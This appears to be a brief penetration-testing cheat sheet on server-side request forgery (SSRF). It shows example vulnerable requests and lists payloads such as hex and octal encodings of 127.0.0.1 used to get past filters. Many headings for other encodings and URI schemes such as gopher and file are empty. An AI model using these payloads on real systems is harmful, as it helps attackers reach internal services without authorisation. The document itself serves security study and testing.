SSRF

Usually, it can be found in the request that contain request to another url, for example like this

POST /api/check/products HTTP/1.1
Host: example.com
Content-Type: application/x-www-form-urlencoded
Origin: https://example.com
Referer: https://example.com

urlApi=http://192.168.1.1%2fapi%2f&id=1

or

GET /image?url=http://192.168.1.1/
Host: example.com

How to exploit

  1. Basic payload

http://127.0.0.1:1337
http://localhost:1337
  1. Hex encoding

http://127.0.0.1 -> http://0x7f.0x0.0x0.0x1
  1. Octal encoding

http://127.0.0.1 -> http://0177.0.0.01
  1. Dword encoding

  1. Mixed encoding

  1. Using URL encoding

  1. Using IPv6

  1. Using bubble text

How to exploit (URI Scheme)

  1. File scheme

  1. Dict scheme

  1. FTP scheme

  1. TFTP scheme

  1. SFTP scheme

  1. LDAP scheme

  1. Gopher scheme

Last updated